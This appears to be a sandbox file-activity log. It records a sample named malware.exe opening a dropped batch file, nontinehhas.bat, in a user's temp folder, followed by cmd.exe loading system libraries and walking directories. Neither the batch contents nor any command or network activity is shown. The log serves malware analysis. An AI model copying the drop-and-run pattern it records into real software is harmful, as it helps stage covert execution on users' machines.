11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Read1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\MPR.dll
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Windows\SysWOW64\mpr.dll
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Windows\SysWOW64\mpr.dll
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Prefetch\CMD.EXE-AC113AA8.pf
11/3/2020 - 11:45:43.90Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Prefetch\CMD.EXE-AC113AA8.pfCMD.EXE-AC113AA8.pf
11/3/2020 - 11:45:43.90Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Prefetch\CMD.EXE-AC113AA8.pfCMD.EXE-AC113AA8.pf
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exe\Device\HarddiskVolume2
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Temp
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Temp
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Temp
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\kernel32.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\kernel32.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ntdll.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ntdll.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\apisetschema.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\apisetschema.dllapisetschema.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\KernelBase.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\KernelBase.dllKernelBase.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\msvcrt.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\msvcrt.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.90Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.90Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\user32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\user32.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\gdi32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\gdi32.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\lpk.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\lpk.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\usp10.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\usp10.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\advapi32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\advapi32.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\rpcrt4.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\rpcrt4.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\sspicli.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\sspicli.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cryptbase.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cryptbase.dllcryptbase.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization\Sorting\SortDefault.nls
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\BOOTSECT.EXE
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch\sysmain.sdb
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch\sysmain.sdb
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Temp\TMP000000032EDF9B37C5E17B29
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\AppPatch\sysmain.sdb
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\BOOTSECT.EXE
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\Temp\TMP000000032EDF9B37C5E17B29
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.106Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\kernel32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\ntdll.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\apisetschema.dllapisetschema.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\KernelBase.dllKernelBase.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\msvcrt.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\user32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\gdi32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\lpk.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\usp10.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\advapi32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\rpcrt4.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\sspicli.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cryptbase.dllcryptbase.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\msctf.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\apphelp.dll
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exe\Device\HarddiskVolume2
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64win.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64cpu.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\wow64log.dll
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.106Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows
11/3/2020 - 11:45:43.106Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\winbrand.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\sechost.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\imm32.dll
11/3/2020 - 11:45:43.325Read1488C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.325Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\
11/3/2020 - 11:45:43.325Unknown1488C:\Windows\SysWOW64\cmd.exeC:\
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.325Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.325Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.325Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.325Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.325Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\"C:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat"
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot
11/3/2020 - 11:45:43.340Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.340Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData
